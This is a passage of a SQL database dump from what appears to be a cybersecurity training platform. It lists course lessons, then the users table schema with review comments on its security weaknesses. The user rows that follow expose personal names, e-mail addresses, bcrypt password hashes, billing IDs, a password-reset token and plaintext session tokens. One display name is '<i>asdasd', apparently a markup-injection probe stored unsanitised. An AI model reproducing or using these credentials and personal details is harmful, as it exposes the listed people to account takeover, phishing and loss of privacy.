(350, 49, 'Analyzing Process Trees', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 233),
(351, 49, 'Detecting Lateral Movement', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 234),
(352, 49, 'Memory Injection Techniques', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 235),
(353, 49, 'Isolating infected Hosts', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 236),
(359, 51, 'Writing SPL (Search Processing Language)', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 242),
(360, 51, 'Correlating Events', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:31', '2025-12-26 18:15:01', 243),
(361, 36, 'SIEM Architecture Deep Dive', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 244),
(362, 36, 'Log Parsing & Normalization', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 245),
(363, 36, 'Advanced Correlation Rules', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 246),
(364, 36, 'Query Optimization', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 247),
(365, 36, 'Building Detection-as-Code', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 248),
(366, 36, 'Final Quiz', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 249),
(367, 52, 'Phishing vs Spear Phishing', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:31', '2026-03-15 02:37:40', 304),
(368, 52, 'URL Analysis', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:31', '2026-03-15 02:37:40', 303),
(369, 53, 'CVSS Scoring System', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:31', '2026-03-15 02:37:40', 920),
(370, 53, 'Prioritizing Patches', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:31', '2026-03-15 02:37:40', 871),
(371, 37, 'Why Memory Forensics?', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:31', '2025-12-27 02:18:03', NULL),
(372, 37, 'Memory Acquisition Techniques', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:31', '2025-12-27 02:18:03', NULL),
(373, 37, 'Volatility Framework Deep Dive', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:31', '2025-12-27 02:18:03', NULL),
(374, 37, 'Process Analysis & Injection Detection', NULL, 'reading', NULL, 50, 374, 1, '2025-12-27 02:18:03', '2025-12-27 02:18:03', NULL),
(375, 37, 'Hunting Rootkits & Hidden Processes', NULL, 'reading', NULL, 50, 375, 1, '2025-12-27 02:18:03', '2025-12-27 02:18:03', NULL),
(376, 37, 'Final Quiz', NULL, 'reading', NULL, 50, 376, 1, '2025-12-27 02:18:03', '2025-12-27 02:18:03', NULL),
(381, 38, 'RE Fundamentals & Tools', NULL, 'reading', NULL, 50, 381, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(382, 38, 'x86/x64 Assembly Essentials', NULL, 'reading', NULL, 50, 382, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(383, 38, 'Static Analysis with IDA/Ghidra', NULL, 'reading', NULL, 50, 383, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(384, 38, 'Debugging with x64dbg', NULL, 'reading', NULL, 50, 384, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(385, 38, 'Unpacking & Anti-Analysis', NULL, 'reading', NULL, 50, 385, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(386, 38, 'Final Quiz', NULL, 'reading', NULL, 50, 386, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(391, 39, 'Threat Intel Lifecycle', NULL, 'reading', NULL, 50, 391, 1, '2025-12-27 02:21:00', '2025-12-27 02:21:00', NULL),
(392, 39, 'Collection & Sources', NULL, 'reading', NULL, 50, 392, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(393, 39, 'Analysis & Attribution', NULL, 'reading', NULL, 50, 393, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(394, 39, 'STIX/TAXII & Sharing', NULL, 'reading', NULL, 50, 394, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(395, 39, 'Operationalizing Intel', NULL, 'reading', NULL, 50, 395, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(396, 39, 'Final Quiz', NULL, 'reading', NULL, 50, 396, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(401, 40, 'Red, Blue, and Purple Teams', NULL, 'reading', NULL, 50, 401, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(402, 40, 'Red Team Operations', NULL, 'reading', NULL, 50, 402, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(403, 40, 'Blue Team Defense', NULL, 'reading', NULL, 50, 403, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(404, 40, 'Purple Team Exercises', NULL, 'reading', NULL, 50, 404, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(405, 40, 'Adversary Emulation', NULL, 'reading', NULL, 50, 405, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(406, 40, 'Final Quiz', NULL, 'reading', NULL, 50, 406, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(411, 41, 'Exercise Framework Setup', NULL, 'reading', NULL, 50, 411, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(412, 41, 'Exercise: Credential Dumping', NULL, 'reading', NULL, 50, 412, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(413, 41, 'Exercise: Lateral Movement', NULL, 'reading', NULL, 50, 413, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(414, 41, 'Exercise: Data Exfiltration', NULL, 'reading', NULL, 50, 414, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(415, 41, 'Metrics & Reporting', NULL, 'reading', NULL, 50, 415, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(416, 41, 'Final Quiz', NULL, 'reading', NULL, 50, 416, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(421, 42, 'Container Security Fundamentals', NULL, 'reading', NULL, 50, 421, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(422, 42, 'Docker Security Hardening', NULL, 'reading', NULL, 50, 422, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(423, 42, 'Kubernetes Security', NULL, 'reading', NULL, 50, 423, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(424, 42, 'Container Image Security', NULL, 'reading', NULL, 50, 424, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(425, 42, 'Runtime Protection', NULL, 'reading', NULL, 50, 425, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(426, 42, 'Final Quiz', NULL, 'reading', NULL, 50, 426, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(431, 43, 'Zero Trust Principles', NULL, 'reading', NULL, 50, 431, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(432, 43, 'Identity as the Perimeter', NULL, 'reading', NULL, 50, 432, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(433, 43, 'Microsegmentation', NULL, 'reading', NULL, 50, 433, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(434, 43, 'Continuous Verification', NULL, 'reading', NULL, 50, 434, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(435, 43, 'Zero Trust Implementation', NULL, 'reading', NULL, 50, 435, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(436, 43, 'Final Quiz', NULL, 'reading', NULL, 50, 436, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(441, 44, 'Security Frameworks Overview', NULL, 'reading', NULL, 50, 441, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(442, 44, 'NIST Cybersecurity Framework', NULL, 'reading', NULL, 50, 442, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(443, 44, 'ISO 27001 & 27002', NULL, 'reading', NULL, 50, 443, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(444, 44, 'SOC 2 Compliance', NULL, 'reading', NULL, 50, 444, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(445, 44, 'PCI-DSS & HIPAA', NULL, 'reading', NULL, 50, 445, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(446, 44, 'Final Quiz', NULL, 'reading', NULL, 50, 446, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(765, 117, 'What is Cyber Threat Intelligence?', 'Define CTI and understand the Pyramid of Value.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:30:44', '2025-12-29 13:30:44', NULL),
(766, 117, 'The Intelligence Cycle', 'The 6 phases of CTI production.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(767, 117, 'Types of Threat Intelligence', 'Strategic, Operational, and Tactical.', 'reading', NULL, 50, 3, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(768, 117, 'Module 1 Assessment', 'Test your knowledge of CTI Fundamentals.', 'quiz', NULL, 100, 4, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(769, 118, 'Introduction to OSINT', 'What is OSINT, The Framework, and OPSEC.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(770, 118, 'Domain & Infrastructure Recon', 'DNS, WHOIS, and Certificate Transparency.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(771, 118, 'Social Media & HUMINT', 'Investigating people and groups.', 'reading', NULL, 50, 3, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(772, 118, 'OSINT Tools Workshop', 'Hands-on: Google Dorks, Shodan, and Maltego.', 'reading', NULL, 50, 4, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(773, 118, 'Module 2 Assessment', 'Test your OSINT knowledge.', 'quiz', NULL, 100, 5, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(774, 119, 'Introduction to Malware Analysis', 'Static vs Dynamic Analysis.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(775, 119, 'Key Indicators: Strings & Hashes', 'Extracting low-hanging fruit.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(776, 119, 'Module 3 Assessment', 'Test your Malware Analysis knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(777, 120, 'IOCs vs IOAs', 'Indicators of Compromise vs Attack.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(778, 120, 'Traffic Light Protocol (TLP)', 'Sharing standards.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(779, 120, 'Module 4 Assessment', 'Test your Indicators & Standards knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(780, 121, 'The ATT&CK Framework', 'Tactics, Techniques, and Procedures.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(781, 121, 'MITRE Navigator', 'Visualizing coverage.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(782, 121, 'Module 5 Assessment', 'Test your MITRE knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(783, 122, 'Introduction to Threat Hunting', 'The Hunter\'s Mindset: Assume Breach.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(784, 122, 'Hunting Techniques', 'Stacking and Clustering.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(785, 122, 'Module 6 Assessment', 'Test your Threat Hunting knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(786, 123, 'TIP Capabilities', 'Aggregation, Normalization, Dissemination.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(787, 123, 'MISP (Malware Information Sharing Platform)', 'The open source standard.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(788, 123, 'Module 7 Assessment', 'Test your TIP knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(789, 124, 'Writing Effective Intel Reports', 'BLUF, Estimative Language, and Audience Analysis.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(790, 124, 'Module 8 Assessment', 'Final Module Assessment.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(791, 125, 'The Incident Response Lifecycle (PICERL)', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(792, 125, 'Introduction to Digital Forensics', NULL, 'reading', NULL, 100, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(793, 125, 'Chain of Custody & Evidence Handling', NULL, 'reading', NULL, 100, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(794, 125, 'Locard\'s Exchange Principle & Order of Volatility', NULL, 'reading', NULL, 120, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(795, 126, 'First Responder Operations', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(796, 126, 'Disk Acquisition & Write Blockers', NULL, 'reading', NULL, 120, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(797, 126, 'Memory (RAM) Acquisition', NULL, 'reading', NULL, 110, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(798, 126, 'Network Evidence Acquisition', NULL, 'reading', NULL, 100, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(799, 127, 'The Windows Registry', NULL, 'reading', NULL, 110, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(800, 127, 'Windows Event Logs', NULL, 'reading', NULL, 120, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(801, 127, 'Evidence of Execution (Prefetch & Shimcache)', NULL, 'reading', NULL, 110, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(802, 127, 'File System Artifacts (MFT, LNK, and Recycle Bin)', NULL, 'reading', NULL, 100, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(803, 128, 'Introduction to Volatility', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(804, 128, 'Process Enumeration (pslist vs psscan)', NULL, 'reading', NULL, 120, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(805, 128, 'Network Connections & Command Line Logs', NULL, 'reading', NULL, 100, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(806, 128, 'Hunting Advanced Malware (Malfind)', NULL, 'reading', NULL, 120, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(807, 129, 'Introduction to Packet Captures', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(808, 129, 'Wireshark Fundamentals', NULL, 'reading', NULL, 110, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(809, 129, 'Analyzing DNS & HTTP Traffic', NULL, 'reading', NULL, 120, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(810, 129, 'Tshark & Command Line Analysis', NULL, 'reading', NULL, 100, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(811, 130, 'Preparation & Identification', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(812, 130, 'Containment', NULL, 'reading', NULL, 110, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(813, 130, 'Eradication & Recovery', NULL, 'reading', NULL, 120, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(814, 130, 'Lessons Learned (Post-Incident Activity)', NULL, 'reading', NULL, 100, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(815, 131, 'The OSI & TCP/IP Models', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(816, 131, 'TCP vs UDP', NULL, 'reading', NULL, 100, 2, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(817, 131, 'Core Protocols & Services', NULL, 'reading', NULL, 120, 3, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(818, 132, 'Navigating Wireshark', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(819, 132, 'Mastering Display Filters', NULL, 'reading', NULL, 120, 2, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(820, 132, 'Following Streams & Object Extraction', NULL, 'reading', NULL, 110, 3, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(821, 133, 'ARP Spoofing & Poisoning', NULL, 'reading', NULL, 110, 1, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(822, 133, 'DNS Spoofing & Hijacking', NULL, 'reading', NULL, 120, 2, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(823, 133, 'Network Denial of Service (DoS)', NULL, 'reading', NULL, 100, 3, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(824, 134, 'Firewalls: The First Line of Defense', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(825, 134, 'IDS vs IPS', NULL, 'reading', NULL, 110, 2, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `users`
--

-- Account table: local credentials, OAuth linkage, subscription/billing state,
-- e-mail verification and password-reset tokens, login lockout counters,
-- server-side session tokens and gamification data.
--
-- NOTE(review): no PRIMARY KEY, UNIQUE or AUTO_INCREMENT appears in this
-- statement. phpMyAdmin dumps normally emit them later in an ALTER TABLE
-- section, which is not in this chunk -- confirm that `id` gets a key and
-- `email` / `username` get UNIQUE there, since nothing here prevents
-- duplicate accounts.
CREATE TABLE `users` (
  `id` int(11) NOT NULL,
  -- OAuth subject id; rows in this dump leave it NULL.
  `google_id` varchar(255) DEFAULT NULL,
  -- Free-text display name. The dump holds raw markup in this column
  -- (e.g. '<i>...'), so it is stored unsanitised and must be output-encoded
  -- wherever it is rendered.
  `name` varchar(255) NOT NULL,
  `email` varchar(255) NOT NULL,
  -- Nullable, presumably for `google_id` sign-ins -- confirm. Dump rows carry
  -- `$2a$10$`-prefixed values (bcrypt-format hashes, cost 10).
  `password` varchar(255) DEFAULT NULL,
  -- Authorisation level; 'alert-admin' and 'pro' are distinct from 'admin'.
  `role` enum('normal','admin','alert-admin','pro') DEFAULT 'normal',
  `profile_picture` varchar(255) DEFAULT NULL,
  `subscription_plan` varchar(50) DEFAULT 'free',
  `subscription_status` varchar(50) DEFAULT 'active',
  -- Billing-provider identifiers (dump rows show 'sub_...' / 'cus_...').
  `subscription_id` varchar(255) DEFAULT NULL,
  `customer_id` varchar(255) DEFAULT NULL,
  `cancel_at_period_end` tinyint(1) DEFAULT 0,
  `current_period_end` datetime DEFAULT NULL,
  `plan_start_date` datetime DEFAULT NULL,
  `plan_end_date` datetime DEFAULT NULL,
  `renewal_date` datetime DEFAULT NULL,
  -- Usage quota counter, reset relative to `last_usage_reset`.
  `alerts_this_month` int(11) DEFAULT 0,
  -- NOTE(review): datetime columns and the timestamp `created_at` differ by
  -- 3h for the same row in the dump data; this looks like datetime columns
  -- hold app-local time while `created_at` is UTC -- confirm before comparing.
  `last_usage_reset` datetime DEFAULT current_timestamp(),
  `username` varchar(255) DEFAULT NULL,
  `surname` varchar(255) DEFAULT NULL,
  `is_verified` tinyint(1) DEFAULT 0,
  -- Verification and reset tokens are stored in clear (dump rows show
  -- 64-hex values), so anyone who can read this table or this dump can use
  -- them until they expire. Storing only a hash of each token and comparing
  -- on lookup removes that exposure; `reset_password_expires` bounds the
  -- reset token's lifetime, the verification token has no expiry column.
  `verification_token` varchar(255) DEFAULT NULL,
  `reset_password_token` varchar(255) DEFAULT NULL,
  `reset_password_expires` datetime DEFAULT NULL,
  -- Brute-force lockout state: attempts counter plus lock expiry instant.
  `failed_login_attempts` int(11) DEFAULT 0,
  `lock_until` datetime DEFAULT NULL,
  -- JSON array of awarded badges (see dump rows); not validated by the schema.
  `badges` text DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `subscription_end_date` datetime DEFAULT NULL,
  `current_mission` int(11) DEFAULT 1,
  `training_completed` tinyint(1) DEFAULT 0,
  -- JSON object of notification flags. longtext + utf8mb4_bin is how MariaDB
  -- represents its JSON alias, so this was probably declared JSON -- confirm.
  `email_preferences` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  -- Server-side session identifiers, stored in clear (64-hex in the dump).
  -- One slot per client type; restoring this dump restores whatever sessions
  -- the application still honours -- rotate them after a restore.
  `session_token` varchar(255) DEFAULT NULL,
  `mobile_session_token` varchar(255) DEFAULT NULL,
  `primary_path` varchar(50) DEFAULT NULL,
  `secondary_path` varchar(50) DEFAULT NULL,
  -- Push-notification target (dump rows show 'ExponentPushToken[...]').
  `expo_push_token` varchar(255) DEFAULT NULL,
  `banner_url` varchar(255) DEFAULT NULL,
  `is_student` tinyint(1) DEFAULT 0,
  `organization_id` int(11) DEFAULT NULL,
  `registration_source` varchar(50) DEFAULT 'web',
  `verification_reminder_sent` tinyint(1) DEFAULT 0,
  `is_subscribed_newsletter` tinyint(1) DEFAULT 1,
  `first_push_sent` tinyint(1) DEFAULT 0
) ;

--
-- Dumping data for table `users`
--

INSERT INTO `users` (`id`, `google_id`, `name`, `email`, `password`, `role`, `profile_picture`, `subscription_plan`, `subscription_status`, `subscription_id`, `customer_id`, `cancel_at_period_end`, `current_period_end`, `plan_start_date`, `plan_end_date`, `renewal_date`, `alerts_this_month`, `last_usage_reset`, `username`, `surname`, `is_verified`, `verification_token`, `reset_password_token`, `reset_password_expires`, `failed_login_attempts`, `lock_until`, `badges`, `created_at`, `subscription_end_date`, `current_mission`, `training_completed`, `email_preferences`, `session_token`, `mobile_session_token`, `primary_path`, `secondary_path`, `expo_push_token`, `banner_url`, `is_student`, `organization_id`, `registration_source`, `verification_reminder_sent`, `is_subscribed_newsletter`, `first_push_sent`) VALUES
(1, NULL, 'Admin', 'halilbaris@gmail.com', '$2a$10$mi7lRWkONSrTxn5aPeQUJu9R6JzJoVHy8GnyxKFq8vPB.Ajo.WcG6', 'admin', '/uploads/1-1767061287330.jpg', 'monthly', 'active', 'sub_1ShZsNL5VKtXn66bbgkTLzUG', 'cus_TetfSZenusTeBk', 0, NULL, NULL, NULL, NULL, 0, '2025-12-12 22:00:24', 'admin', 'User', 1, NULL, '65e71953f566955338d1ea13378febb8a877076aecfc8074751db31375851c04', '2026-01-12 17:18:20', 0, NULL, NULL, '2025-12-12 19:00:24', NULL, 1, 0, '{\"weekly_report\":false,\"alert_assigned\":false,\"investigation_graded\":false,\"newsletter\":false}', '26b2107b88e7c42d0e196faaf1c771f2330f1207e5e37470300c98d5c30cd476', 'e539886fb6f4d5a0f2cc1253c7d0f8923e483139b3131301c83d636f2aa8424c', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(5, NULL, 'Rose', 'gulmairamsnv@gmail.com', '$2a$10$lcTDAr1stngbpoeDJAWON.rf4cKxAi8I6fuXrTz89vwOqMzRLZLVC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 02:26:08', 'RoseM', 'Maryam', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-15 23:26:08', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(6, NULL, 'Elif', 'etkinelifilm@gmail.com', '$2a$10$A03K7rDjcC22ePJ9zAHcs.vMbfw9qSYeHER57z7aYcMFOQVv41c2W', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 02:46:00', 'cafeantinkuntin', 'E', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-15 23:46:00', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(7, NULL, 'Murat', 'muratdibi@outlook.com', '$2a$10$fx.y8i1Hq7/nvVfj/nzLfevLAF7SpfzN9LZonOZf6db3ANxM1C1ai', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 02:57:15', 'mudics', 'Dibi', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-15 23:57:15', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(8, NULL, 'Mustafa', 'mustafatorun@gmail.com', '$2a$10$s8s4.SrBLUcV94UKjrrbZuydNoiWGXxVWm0iz6Q3zD0BNOuCkdHe.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 03:56:15', 'mustafa', 'Torun', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-16 00:56:15', NULL, 1, 0, '{\"weekly_report\": false, \"alert_assigned\": false, \"investigation_graded\": false, \"newsletter\": false}', '58f13a4e1e6cab5220426a382ae92801da197921267eaacf27d3d3f8436fdfd7', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(16, NULL, 'Michael', 'harleycoplan7@hotmail.com', '$2a$10$drUDZsP4zZn82pno3TZFHeK3haIOn/thxwmAPujjLBdJXvbNffQOq', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-17 20:36:33', 'Michael7', 'Coplan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 17:36:33', NULL, 2, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(17, NULL, 'Nic', 'bnicolepeeples@icloud.com', '$2a$10$YFtWqBYyIVj6xa8YNL1bL.ckFR7HmVLGZnsQYZTtbTP6P3P3fE44y', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-17 20:45:52', 'Nicpeeps', 'Peeps', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 17:45:52', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(18, NULL, '<i>asdasd', 'xmglcalwxppluopcgf@enotj.com', '$2a$10$f97OaLfPTnr1JPWsWWIOweT/lPFGS7SZHhEuRlh.YzCdVNchOiaH2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-17 22:10:54', 'xmglcalwxppluopcgf@enotj.com', '<i>asdasd', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 19:10:54', NULL, 4, 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(19, NULL, 'Salah', 'salah_22313@hotmail.com', '$2a$10$DVie6qZhvrnxJGLnL59Wx.c.M0rHvZzcWU30i3wgu/iPmqs2YCnBO', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-17 22:52:02', 'salahali', 'Ali', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 19:52:02', NULL, 2, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
